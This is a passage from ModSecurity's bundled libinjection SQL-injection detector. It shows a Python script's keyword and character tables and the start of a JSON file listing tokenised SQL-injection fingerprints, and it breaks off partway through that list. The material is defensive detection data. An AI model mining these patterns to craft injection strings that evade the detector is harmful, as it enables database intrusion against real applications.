'DBMS_LOCK.SLEEP' : 'f', 'DBMS_UTILITY.SQLID_TO_SQLHASH': 'f', 'USER_LOCK.SLEEP' : 'f', # '!=': 'o', # oracle '||': '&', '&&': '&', '>=': 'o', '>>': 'o', '<=': 'o', '<>': 'o', ':=': 'o', '::': 'o', '<<': 'o', '!<': 'o', # http://msdn.microsoft.com/en-us/library/ms188074.aspx '!>': 'o', # http://msdn.microsoft.com/en-us/library/ms188074.aspx '+=': 'o', '-=': 'o', '*=': 'o', '/=': 'o', '%=': 'o', '|=': 'o', '&=': 'o', '^=': 'o', '|/': 'o', # http://www.postgresql.org/docs/9.1/static/functions-math.html '!!': 'o', # http://www.postgresql.org/docs/9.1/static/functions-math.html '~*': 'o', # http://www.postgresql.org/docs/9.1/static/functions-matching.html # problematic since ! and ~ are both unary operators in other db engines # converting to one unary operator is probably ok # '!~', # http://www.postgresql.org/docs/9.1/static/functions-matching.html '@>': 'o', '<@': 'o', # '!~*' # pgsql "AT TIME ZONE" 'AT TIME' : 'n', 'AT TIME ZONE' : 'k', 'IN BOOLEAN' : 'n', 'IN BOOLEAN MODE' : 'k', # IS DISTINCT - IBM DB2 # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'IS DISTINCT FROM' : 'o', 'IS DISTINCT' : 'n', 'IS NOT DISTINCT FROM' : 'o', 'IS NOT DISTINCT' : 'n', 'CROSS JOIN' : 'k', 'INNER JOIN' : 'k', 'ALTER DOMAIN' : 'k', 'ALTER TABLE' : 'k', 'GROUP BY' : 'B', 'ORDER BY' : 'B', 'OWN3D BY' : 'B', 'READ WRITE' : 'k', # 'LOCAL TABLE' pgsql/oracle # http://www.postgresql.org/docs/current/static/sql-lock.html 'LOCK TABLE' : 'k', # 'LOCK TABLES' MYSQL # http://dev.mysql.com/doc/refman/4.1/en/lock-tables.html 'LOCK TABLES' : 'k', 'LEFT OUTER' : 'k', 'LEFT OUTER JOIN' : 'k', 'LEFT JOIN' : 'k', 'RIGHT OUTER' : 'k', 'RIGHT OUTER JOIN' : 'k', 'RIGHT JOIN' : 'k', # http://technet.microsoft.com/en-us/library/ms187518(v=sql.105).aspx 'FULL JOIN' : 'k', 'FULL OUTER' : 'k', 'FULL OUTER JOIN' : 'k', 'NATURAL JOIN' : 'k', 'NATURAL INNER' : 'k', 'NATURAL OUTER' : 'k', 'NATURAL LEFT' : 'k', 'NATURAL LEFT OUTER': 'k', 'NATURAL LEFT OUTER JOIN': 'k', 'NATURAL RIGHT OUTER JOIN': 'k', 'NATURAL FULL OUTER JOIN': 'k', 'NATURAL RIGHT' : 'k', 'NATURAL FULL' : 'k', 'SOUNDS LIKE' : 'o', 'IS NOT' : 'o', # IBM DB2 # http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Fsqlp%2Frbafykeyu.htm 'NEXT VALUE' : 'n', 'NEXT VALUE FOR' : 'k', 'PREVIOUS VALUE' : 'n', 'PREVIOUS VALUE FOR' : 'k', 'NOT LIKE' : 'o', 'NOT BETWEEN' : 'o', 'NOT SIMILAR' : 'o', # 'NOT RLIKE' -- MySQL 'NOT RLIKE' : 'o', 'NOT REGEXP' : 'o', 'NOT IN' : 'k', 'SIMILAR TO' : 'o', 'NOT SIMILAR TO' : 'o', 'SELECT DISTINCT' : 'E', 'UNION ALL' : 'U', 'UNION DISTINCT' : 'U', 'UNION DISTINCT ALL' : 'U', 'UNION ALL DISTINCT' : 'U', # INTO.. # http://dev.mysql.com/doc/refman/5.0/en/select.html 'INTO OUTFILE' : 'k', 'INTO DUMPFILE' : 'k', 'WAITFOR DELAY' : 'E', 'WAITFOR TIME' : 'E', 'WAITFOR RECEIVE' : 'E', 'WITH ROLLUP' : 'k', # 'INTERSECT ALL' -- ORACLE 'INTERSECT ALL' : 'U', # hacker mistake 'SELECT ALL' : 'E', # types 'DOUBLE PRECISION': 't', 'CHARACTER VARYING': 't', # MYSQL # http://dev.mysql.com/doc/refman/5.1/en/innodb-locking-reads.html 'LOCK IN': 'n', 'LOCK IN SHARE': 'n', 'LOCK IN SHARE MODE': 'k', # MYSQL # http://dev.mysql.com/doc/refman/5.1/en/innodb-locking-reads.html 'FOR UPDATE': 'k', # TSQL (MS) # http://msdn.microsoft.com/en-us/library/ms175046.aspx 'EXECUTE AS': 'E', 'EXECUTE AS LOGIN': 'E', # ORACLE # http://www.shift-the-oracle.com/sql/select-for-update.html 'FOR UPDATE OF': 'k', 'FOR UPDATE WAIT': 'k', 'FOR UPDATE NOWAIT': 'k', 'FOR UPDATE SKIP': 'k', 'FOR UPDATE SKIP LOCKED': 'k' } CHARMAP = [ 'CHAR_WHITE', # 0 'CHAR_WHITE', # 1 'CHAR_WHITE', # 2 'CHAR_WHITE', # 3 'CHAR_WHITE', # 4 'CHAR_WHITE', # 5 'CHAR_WHITE', # 6 'CHAR_WHITE', # 7 'CHAR_WHITE', # 8 'CHAR_WHITE', # 9 'CHAR_WHITE', # 10 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', # 20 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', 'CHAR_WHITE', # 30 'CHAR_WHITE', # 31 'CHAR_WHITE', # 32 'CHAR_BANG', # 33 ! 'CHAR_STR', # 34 " 'CHAR_HASH', # 35 "#" 'CHAR_MONEY', # 36 $ 'CHAR_OP1', # 37 % 'CHAR_OP2', # 38 & 'CHAR_STR', # 39 ' 'CHAR_LEFTPARENS', # 40 ( 'CHAR_RIGHTPARENS', # 41 ) 'CHAR_OP2', # 42 * 'CHAR_UNARY', # 43 + 'CHAR_COMMA', # 44 , 'CHAR_DASH', # 45 - 'CHAR_NUM', # 46 . 'CHAR_SLASH', # 47 / 'CHAR_NUM', # 48 0 'CHAR_NUM', # 49 1 'CHAR_NUM', # 50 2 'CHAR_NUM', # 51 3 'CHAR_NUM', # 52 4 'CHAR_NUM', # 53 5 'CHAR_NUM', # 54 6 'CHAR_NUM', # 55 7 'CHAR_NUM', # 56 8 'CHAR_NUM', # 57 9 'CHAR_OP2', # 58 : colon 'CHAR_SEMICOLON', # 59 ; semiclon 'CHAR_OP2', # 60 < 'CHAR_OP2', # 61 = 'CHAR_OP2', # 62 > 'CHAR_OTHER', # 63 ? BEEP BEEP 'CHAR_VAR', # 64 @ 'CHAR_WORD', # 65 A 'CHAR_BSTRING', # 66 B 'CHAR_WORD', # 67 C 'CHAR_WORD', # 68 D 'CHAR_ESTRING', # 69 E 'CHAR_WORD', # 70 F 'CHAR_WORD', # 71 G 'CHAR_WORD', # 72 H 'CHAR_WORD', # 73 I 'CHAR_WORD', # 74 J 'CHAR_WORD', # 75 K 'CHAR_WORD', # 76 L 'CHAR_WORD', # 77 M 'CHAR_NQSTRING', # 78 N 'CHAR_WORD', # 79 O 'CHAR_WORD', # 80 P 'CHAR_QSTRING', # 81 Q 'CHAR_WORD', # 82 R 'CHAR_WORD', # 83 S 'CHAR_WORD', # 84 T 'CHAR_USTRING', # 85 U special pgsql unicode 'CHAR_WORD', # 86 V 'CHAR_WORD', # 87 W 'CHAR_XSTRING', # 88 X 'CHAR_WORD', # 89 Y 'CHAR_WORD', # 90 Z 'CHAR_BWORD', # 91 [ B for Bracket, for Microsoft SQL SERVER 'CHAR_BACK', # 92 \\ 'CHAR_OTHER', # 93 ] 'CHAR_OP1', # 94 ^ 'CHAR_WORD', # 95 _ underscore 'CHAR_TICK', # 96 ` backtick 'CHAR_WORD', # 97 a 'CHAR_BSTRING', # 98 b 'CHAR_WORD', # 99 c 'CHAR_WORD', # 100 d 'CHAR_ESTRING', # 101 e 'CHAR_WORD', # 102 f 'CHAR_WORD', # 103 g 'CHAR_WORD', # 104 h 'CHAR_WORD', # 105 i 'CHAR_WORD', # 106 j 'CHAR_WORD', # 107 k 'CHAR_WORD', # 108 l 'CHAR_WORD', # 109 m 'CHAR_NQSTRING', # 110 n special oracle code 'CHAR_WORD', # 111 o 'CHAR_WORD', # 112 p 'CHAR_QSTRING', # 113 q special oracle code 'CHAR_WORD', # 114 r 'CHAR_WORD', # 115 s 'CHAR_WORD', # 116 t 'CHAR_USTRING', # 117 u special pgsql unicode 'CHAR_WORD', # 118 v 'CHAR_WORD', # 119 w 'CHAR_XSTRING', # 120 x 'CHAR_WORD', # 121 y 'CHAR_WORD', # 122 z 'CHAR_LEFTBRACE', # 123 { left brace 'CHAR_OP2', # 124 | pipe 'CHAR_RIGHTBRACE', # 125 } right brace 'CHAR_UNARY', # 126 ~ 'CHAR_WHITE', # 127 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', # 130 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #140 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #150 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WHITE', #160 0xA0 latin1 whitespace 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #170 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #180 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #190 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #200 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #210 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #220 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #230 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #240 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', #250 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD', 'CHAR_WORD' ] import json def get_fingerprints(): """ fingerprints are stored in plain text file, one fingerprint per file the result is sorted """ with open('fingerprints.txt', 'r') as lines: sqlipat = [line.strip() for line in lines] return sorted(sqlipat) def dump(): """ generates a JSON file, sorted keys """ objs = { 'keywords': KEYWORDS, 'charmap': CHARMAP, 'fingerprints': get_fingerprints() } return json.dumps(objs, sort_keys=True, indent=4) if __name__ == '__main__': import sys if len(CHARMAP) != 256: sys.stderr.write("Assert failed: charmap is %d characters\n" % len(CHARMAP)) sys.exit(1) print dump() # pylint: disable=C0301,C0302 modsecurity-v3.0.4/others/libinjection/src/sqlparse_data.json0000644000175000017500000054440713607066311025010 0ustar zimmerlezimmerle{ "charmap": [ "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_WHITE", "CHAR_BANG", "CHAR_STR", "CHAR_HASH", "CHAR_MONEY", "CHAR_OP1", "CHAR_OP2", "CHAR_STR", "CHAR_LEFTPARENS", "CHAR_RIGHTPARENS", "CHAR_OP2", "CHAR_UNARY", "CHAR_COMMA", "CHAR_DASH", "CHAR_NUM", "CHAR_SLASH", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_NUM", "CHAR_OP2", "CHAR_SEMICOLON", "CHAR_OP2", "CHAR_OP2", "CHAR_OP2", "CHAR_OTHER", "CHAR_VAR", "CHAR_WORD", "CHAR_BSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_ESTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_NQSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_QSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_USTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_XSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_BWORD", "CHAR_BACK", "CHAR_OTHER", "CHAR_OP1", "CHAR_WORD", "CHAR_TICK", "CHAR_WORD", "CHAR_BSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_ESTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_NQSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_QSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_USTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_XSTRING", "CHAR_WORD", "CHAR_WORD", "CHAR_LEFTBRACE", "CHAR_OP2", "CHAR_RIGHTBRACE", "CHAR_UNARY", "CHAR_WHITE", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WHITE", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD", "CHAR_WORD" ], "fingerprints": [ "&(1)U", "&(1)o", "&(1o(", "&(1of", "&(1os", "&(1ov", "&(f()", "&(f(1", "&(f(f", "&(f(n", "&(f(s", "&(f(v", "&(n)U", "&(n)o", "&(no(", "&(nof", "&(nos", "&(nov", "&(s)U", "&(s)o", "&(so(", "&(so1", "&(sof", "&(son", "&(sos", "&(sov", "&(v)U", "&(v)o", "&(vo(", "&(vof", "&(vos", "&1UE(", "&1UE1", "&1UEf", "&1UEk", "&1UEn", "&1UEs", "&1UEv", "&1o(1", "&1o(f", "&1o(n", "&1o(s", "&1o(v", "&1of(", "&1os(", "&1os1", "&1osU", "&1osf", "&1osv", "&1ov(", "&1ovU", "&1ovf", "&1ovo", "&1ovs", "&f()U", "&f()o", "&f(1)", "&f(1o", "&f(f(", "&f(n)", "&f(no", "&f(s)", "&f(so", "&f(v)", "&f(vo", "&nUE(", "&nUE1", "&nUEf", "&nUEk", "&nUEn", "&nUEs", "&nUEv", "&no(1", "&no(f", "&no(n", "&no(s", "&no(v", "&nof(", "&nos(", "&nos1", "&nosU", "&nosf", "&nosv", "&nov(", "&novU", "&novf", "&novo", "&novs", "&sUE(", "&sUE1", "&sUEf", "&sUEk", "&sUEn", "&sUEs", "&sUEv", "&so(1", "&so(f", "&so(n", "&so(s", "&so(v", "&so1(", "&so1U", "&so1f", "&so1n", "&so1s", "&so1v", "&sof(", "&son(", "&son1", "&sonU", "&sonf", "&sos(", "&sos1", "&sosU", "&sosf", "&sosv", "&sov(", "&sovU", "&sovf", "&sovo", "&sovs", "&vUE(", "&vUE1", "&vUEf", "&vUEk", "&vUEn", "&vUEs", "&vUEv", "&vo(1", "&vo(f", "&vo(n", "&vo(s", "&vo(v", "&vof(", "&vos(", "&vos1", "&vosU", "&vosf", "&vosv", ")&(Ek", ")&(En", ")UE(1", ")UE(f", ")UE(n", ")UE(s", ")UE(v", ")UE1k", ")UE1o", ")UEf(", ")UEk(", ")UEk1", ")UEkf", ")UEkn", ")UEks", ")UEkv", ")UEnk", ")UEno", ")UEsk", ")UEso", ")UEvk", ")UEvo", "1&(1&", "1&(1)", "1&(1,", "1&(1o", "1&(E(", "1&(E1", "1&(Ef", "1&(Ek", "1&(En", "1&(Eo", "1&(Es", "1&(Ev", "1&(f(", "1&(n&", "1&(n)", "1&(n,", "1&(no", "1&(s&", "1&(s)", "1&(s,", "1&(so", "1&(v&", "1&(v)", "1&(v,", "1&(vo", "1&1", "1&1&(", "1&1&1", "1&1&f", "1&1&n", "1&1&s", "1&1&v", "1&1)&", "1&1)U", "1&1)c", "1&1)o", "1&1;", "1&1;E", "1&1;T", "1&1;c", "1&1B(", "1&1B1", "1&1Bf", "1&1Bn", "1&1Bs", "1&1Bv", "1&1Ek", "1&1En", "1&1Tn", "1&1U", "1&1U(", "1&1U;", "1&1UE", "1&1Uc", "1&1c", "1&1f(", "1&1k(", "1&1k1", "1&1kf", "1&1kn", "1&1ks", "1&1kv", "1&1o(", "1&1of", "1&1os", "1&1ov", "1&E(1", "1&E(f", "1&E(n", "1&E(o", "1&E(s", "1&E(v", "1&E1", "1&E1;", "1&E1c", "1&E1k", "1&E1o", "1&EUE", "1&Ef(", "1&Ek(", "1&Ek1", "1&EkU", "1&Ekf", "1&Ekn", "1&Eks", "1&Ekv", "1&En", "1&En;", "1&Enc", "1&Enk", "1&Eno", "1&Es", "1&Es;", "1&Esc", "1&Esk", "1&Eso", "1&Ev", "1&Ev;", "1&Evc", "1&Evk", "1&Evo", "1&f()", "1&f(1", "1&f(E", "1&f(f", "1&f(n", "1&f(s", "1&f(v", "1&k&(", "1&k&1", "1&k&f", "1&k&n", "1&k&s", "1&k&v", "1&k(1", "1&k(f", "1&k(n", "1&k(s", "1&k(v", "1&k1o", "1&kc", "1&kf(", "1&knk", "1&ko(", "1&ko1", "1&kof", "1&kok", "1&kon", "1&kos", "1&kov", "1&kso", "1&kvo", "1&n&(", "1&n&1", "1&n&f", "1&n&n", "1&n&s", "1&n&v", "1&n)&", "1&n)U", "1&n)c", "1&n)o", "1&n;", "1&n;E", "1&n;T", "1&n;c", "1&nB(", "1&nB1", "1&nBf", "1&nBn", "1&nBs", "1&nBv", "1&nEn", "1&nTn", "1&nU", "1&nU(", "1&nU;", "1&nUE", "1&nUc", "1&nc", "1&nf(", "1&nk(", "1&nk1", "1&nkf", "1&nkn", "1&nks", "1&nkv", "1&no(", "1&nof", "1&nos", "1&nov", "1&s", "1&s&(", "1&s&1", "1&s&f", "1&s&n", "1&s&s", "1&s&v", "1&s)&", "1&s)U", "1&s)c", "1&s)o", "1&s1", "1&s1;", "1&s1c", "1&s;", "1&s;E", "1&s;T", "1&s;c", "1&sB(", "1&sB1", "1&sBf", "1&sBn", "1&sBs", "1&sBv", "1&sEk", "1&sEn", "1&sTn", "1&sU", "1&sU(", "1&sU;", "1&sUE", "1&sUc", "1&sc", "1&sf(", "1&sk(", "1&sk1", "1&skf", "1&skn", "1&sks", "1&skv", "1&so(", "1&so1", "1&sof", "1&son", "1&sos", "1&sov", "1&sv", "1&sv;", "1&svc", "1&svo", "1&v", "1&v&(", "1&v&1", "1&v&f", "1&v&n", "1&v&s", "1&v&v", "1&v)&", "1&v)U", "1&v)c", "1&v)o", "1&v;", "1&v;E", "1&v;T", "1&v;c", "1&vB(", "1&vB1", "1&vBf", "1&vBn", "1&vBs", "1&vBv", "1&vEk", "1&vEn", "1&vTn", "1&vU", "1&vU(", "1&vU;", "1&vUE", "1&vUc", "1&vc", "1&vf(", "1&vk(", "1&vk1", "1&vkf", "1&vkn", "1&vks", "1&vkv", "1&vo(", "1&vof", "1&vos", "1&vs", "1&vs;", "1&vsc", "1&vso", "1(Ef(", "1(Ekf", "1(Ekn", "1(Enk", "1(U(E", "1)&(1", "1)&(E", "1)&(f", "1)&(n", "1)&(s", "1)&(v", "1)&1", "1)&1&", "1)&1)", "1)&1;", "1)&1B", "1)&1U", "1)&1c", "1)&1f", "1)&1o", "1)&f(", "1)&n", "1)&n&", "1)&n)", "1)&n;", "1)&nB", "1)&nU", "1)&nc", "1)&nf", "1)&no", "1)&s", "1)&s&", "1)&s)", "1)&s;", "1)&sB", "1)&sU", "1)&sc", "1)&sf", "1)&so", "1)&v", "1)&v&", "1)&v)", "1)&v;", "1)&vB", "1)&vU", "1)&vc", "1)&vf", "1)&vo", "1),(1", "1),(f", "1),(n", "1),(s", "1),(v", "1);E(", "1);E1", "1);Ef", "1);Ek", "1);En", "1);Eo", "1);Es", "1);Ev", "1);T(", "1);T1", "1);Tf", "1);Tk", "1);Tn", "1);To", "1);Ts", "1);Tv", "1)B(1", "1)B(f", "1)B(n", "1)B(s", "1)B(v", "1)B1", "1)B1&", "1)B1;", "1)B1U", "1)B1c", "1)B1k", "1)B1n", "1)B1o", "1)Bf(", "1)Bn", "1)Bn&", "1)Bn;", "1)BnU", "1)Bnc", "1)Bnk", "1)Bno", "1)Bs", "1)Bs&", "1)Bs;", "1)BsU", "1)Bsc", "1)Bsk", "1)Bso", "1)Bv", "1)Bv&", "1)Bv;", "1)BvU", "1)Bvc", "1)Bvk", "1)Bvo", "1)E(1", "1)E(f", "1)E(n", "1)E(s", "1)E(v", "1)E1c", "1)E1o", "1)Ef(", "1)Ek(", "1)Ek1", "1)Ekf", "1)Ekn", "1)Eks", "1)Ekv", "1)Enc", "1)Eno", "1)Esc", "1)Eso", "1)Evc", "1)Evo", "1)U(E", "1)UE(", "1)UE1", "1)UEf", "1)UEk", "1)UEn", "1)UEs", "1)UEv", "1)c", "1)f(f", "1)k(1", "1)k(f", "1)k(n", "1)k(s", "1)k(v", "1)k1&", "1)k1;", "1)k1B", "1)k1E", "1)k1U", "1)k1o", "1)kB(", "1)kB1", "1)kBf", "1)kBn", "1)kBs", "1)kBv", "1)kUE", "1)kf(", "1)kn&", "1)kn;", "1)knB", "1)knE", "1)knU", "1)knc", "1)knk", "1)ks&", "1)ks;", "1)ksB", "1)ksE", "1)ksU", "1)kso", "1)kv&", "1)kv;", "1)kvB", "1)kvE", "1)kvU", "1)kvo", "1)o(1", "1)o(E", "1)o(f", "1)o(n", "1)o(s", "1)o(v", "1)o1", "1)o1&", "1)o1)", "1)o1;", "1)o1B", "1)o1U", "1)o1c", "1)o1k", "1)of(", "1)on&", "1)on)", "1)on;", "1)onB", "1)onU", "1)onc", "1)onk", "1)os", "1)os&", "1)os)", "1)os;", "1)osB", "1)osU", "1)osc", "1)osk", "1)ov", "1)ov&", "1)ov)", "1)ov;", "1)ovB", "1)ovU", "1)ovc", "1)ovk", "1)ovo", "1,(1)", "1,(1o", "1,(E(", "1,(E1", "1,(Ef", "1,(Ek", "1,(En", "1,(Es", "1,(Ev", "1,(f(", "1,(n)", "1,(no", "1,(s)", "1,(so", "1,(v)", "1,(vo", "1,f()", "1,f(1", "1,f(f", "1,f(n", "1,f(s", "1,f(v", "1;E(1", "1;E(E", "1;E(f", "1;E(n", "1;E(s", "1;E(v", "1;E1,", "1;E1;", "1;E1T", "1;E1c", "1;E1k", "1;E1o", "1;Ef(", "1;Ek(", "1;Ek1", "1;Ekf", "1;Ekn", "1;Eko", "1;Eks", "1;Ekv", "1;En,", "1;En;", "1;EnE", "1;EnT", "1;Enc", "1;Enk", "1;Eno", "1;Es,", "1;Es;", "1;EsT", "1;Esc", "1;Esk", "1;Eso", "1;Ev,", "1;Ev;", "1;EvT", "1;Evc", "1;Evk", "1;Evo", "1;T(1", "1;T(E", "1;T(c", "1;T(f", "1;T(n", "1;T(s", "1;T(v", "1;T1(", "1;T1,", "1;T1;", "1;T1T", "1;T1c", "1;T1f", "1;T1k", "1;T1o", "1;T;", "1;T;c", "1;TTn", "1;Tf(", "1;Tk(", "1;Tk1", "1;Tkf", "1;Tkk", "1;Tkn", "1;Tko", "1;Tks", "1;Tkv", "1;Tn(", "1;Tn,", "1;Tn1", "1;Tn;", "1;TnT", "1;Tnc", "1;Tnf", "1;Tnk", "1;Tnn", "1;Tno", "1;Tns", "1;Tnv", "1;To(", "1;Ts(", "1;Ts,", "1;Ts;", "1;TsT", "1;Tsc", "1;Tsf", "1;Tsk", "1;Tso", "1;Tv(", "1;Tv,", "1;Tv;", "1;TvT", "1;Tvc", "1;Tvf", "1;Tvk", "1;Tvo", "1;n:T", "1A(f(", "1A(n)", "1A(no", "1A(s)", "1A(so", "1A(v)", "1A(vo", "1Af()", "1Af(1", "1Af(f", "1Af(n", "1Af(s", "1Af(v", "1AsUE", "1Aso(", "1Aso1", "1Asof", "1Ason", "1Asos", "1Asov", "1AtUE", "1Ato(", "1Ato1", "1Atof", "1Aton", "1Atos", "1Atov", "1AvUE", "1Avo(", "1Avof", "1Avos", "1B(1)", "1B(1o", "1B(f(", "1B(no", "1B(s)", "1B(so", "1B(v)", "1B(vo", "1B1", "1B1&(", "1B1&1", "1B1&f", "1B1&n", "1B1&s", "1B1&v", "1B1,(", "1B1,f", "1B1;", "1B1;c", "1B1B(", "1B1B1", "1B1Bf", "1B1Bn", "1B1Bs", "1B1Bv", "1B1U(", "1B1UE", "1B1c", "1B1k(", "1B1k1", "1B1kf", "1B1kn", "1B1ks", "1B1kv", "1B1o(", "1B1of", "1B1os", "1B1ov", "1BE(1", "1BE(f", "1BE(n", "1BE(s", "1BE(v", "1BEk(", "1Bf()", "1Bf(1", "1Bf(f", "1Bf(n", "1Bf(s", "1Bf(v", "1Bn", "1Bn&(", "1Bn&1", "1Bn&f", "1Bn&n", "1Bn&s", "1Bn&v", "1Bn,(", "1Bn,f", "1Bn;", "1Bn;c", "1BnB(", "1BnB1", "1BnBf", "1BnBn", "1BnBs", "1BnBv", "1BnU(", "1BnUE", "1Bnc", "1Bnk(", "1Bnk1", "1Bnkf", "1Bnkn", "1Bnks", "1Bnkv", "1Bno(", "1Bnof", "1Bnos", "1Bnov", "1Bs", "1Bs&(", "1Bs&1", "1Bs&f", "1Bs&n", "1Bs&s", "1Bs&v", "1Bs,(", "1Bs,f", "1Bs;", "1Bs;c", "1BsB(", "1BsB1", "1BsBf", "1BsBn", 